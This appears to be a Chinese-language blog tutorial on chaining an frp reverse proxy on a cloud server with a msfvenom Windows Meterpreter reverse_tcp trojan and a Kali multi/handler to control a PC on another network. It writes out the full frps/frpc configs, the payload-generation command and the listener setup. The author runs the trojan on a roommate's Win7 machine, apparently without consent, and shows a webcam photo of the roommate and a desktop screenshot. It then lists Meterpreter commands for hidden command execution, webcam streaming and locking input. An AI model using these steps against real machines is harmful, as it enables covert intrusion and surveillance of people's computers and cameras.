frp反向代理+内网穿透+ Metasploit渗透windows

实验环境:

        阿里云ECS一台:x.x.x.x

        内网kali控制端:192.168.2.104

        外网win7主机:

前言

       我在家,我室友在学校,在两个完全不同的局域网,我想穿过公网实现远控他的电脑,我上篇文章写过局域网下kali控制win7,想想,黑客都和肉鸡在一个局域网了,要是遇见高手了还怕抓不住你?,自己琢磨了很久,想到我前面刚好做过frp内网穿透,由于frp是一个高效反向代理和内网穿透的软件,刚好配合kali的metsploit 做真正的远控,想想就觉得牛逼,哈哈,只是自己的猜想,网上找资料没找到,所以自己动手了。

场景描述

      frp反向代理+内网穿透+ Metasploit渗透windows_第1张图片

       

操作步骤:

       由于上篇文章写过搭建frp,所以这里不详细写,很简单的,直接给配置文件,不会frp请看:https://blog.csdn.net/qq_38228830/article/details/85722385

 1、阿里云主机上启动frps

       配置文件如下:

         vim frps.ini

#frp服务端与客户端连接端口,frps和frpc必须一致
bind_port = 7000


#下面配置可以不写,个人意愿
# 仪表盘端口,只有设置了才能使用仪表盘(即后台)
dashboard_port = 7500
# 仪表盘访问的用户名密码,如果不设置,则默认都是 admin
dashboard_user = admin
dashboard_pwd = admin

     启动frps:./frps. -c ./frps.ini

         frp反向代理+内网穿透+ Metasploit渗透windows_第2张图片

  2、 kali启动frpc:

        配置文件如下:

              vim frpc.ini 

[common]
server_addr = 你的云主机ip
server_port = 7000        #frpc工作端口,必须和上面frps保持一致

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555          #转发给本机的5555
remote_port = 6000         #服务端用6000端口转发给本机

       启动frpc: ./frpc -c ./frpc.ini

              frp反向代理+内网穿透+ Metasploit渗透windows_第3张图片

          这时服务端有显示了:

              frp反向代理+内网穿透+ Metasploit渗透windows_第4张图片

      到此frp反向代理+内网穿透做完,下面开始木马程序制作与监听控制。

3、msfvenom制作Windows木马程序:关键步骤

          root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=你的公网ip lport=6000 -f exe x>Xaly.exe

          frp反向代理+内网穿透+ Metasploit渗透windows_第5张图片

         lhost:必需设置为你的公网ip

         lport:设置你在frpc.ini的remote_port = 6000

         只有通过服务器的6000端口数据包才能成功转发到我们的kali上来,这也是为什么要用frp反向代理原因。

制作好后将xaly.exe发送到目标Windows上

        frp反向代理+内网穿透+ Metasploit渗透windows_第6张图片

4、开始监听:关键步骤

     在kali中

msfconsole
 
msf > use exploit/multi/handler
 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 
payload => windows/meterpreter/reverse_tcp
 
msf exploit(multi/handler) > set lhost 127.0.0.1   #设置监听ip,必须和frpc中的local_ip 一致
 
lhost => 127.0.0.1
 
msf exploit(multi/handler) > set lport 5555        #设置监听端口,与frpc中的local_port一致
 
lport =>5555

msf exploit(multi/handler) > exploit 

 

开始测试

             frp反向代理+内网穿透+ Metasploit渗透windows_第7张图片

Windows端运行木马,

      先观察我们阿里云的frp服务端情况

       frp反向代理+内网穿透+ Metasploit渗透windows_第8张图片

  再观察kali监控情况:

       frp反向代理+内网穿透+ Metasploit渗透windows_第9张图片

 表示获得了win7的控制权了,下面测试命令

      webcan_snap  利用摄像头拍照

     

      我室友照片

      frp反向代理+内网穿透+ Metasploit渗透windows_第10张图片

截取他的win7桌面

      screenshot

     

      frp反向代理+内网穿透+ Metasploit渗透windows_第11张图片

   其他命令:

    uictl开关键盘/鼠标
    uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
    uictl disable mouse  #禁用鼠标
    uictl disable keyboard  #禁用键盘
     
     
     
     
    webcam摄像头命令
    webcam_list  #查看摄像头
    webcam_snap   #通过摄像头拍照
    webcam_stream   #通过摄像头开启视频
     
     
     
    execute执行文件
    execute #在目标机中执行文件
    execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

更详细资料见:

        meterpreter使用攻略:https://blog.csdn.net/qq_38228830/article/details/85927942

        搭建frp内网穿透:https://blog.csdn.net/qq_38228830/article/details/85722385

        kali控制安卓手机:https://blog.csdn.net/qq_38228830/article/details/85886489

        kali控制win7电脑:https://blog.csdn.net/qq_38228830/article/details/85928186

你可能感兴趣的:(kali,linux)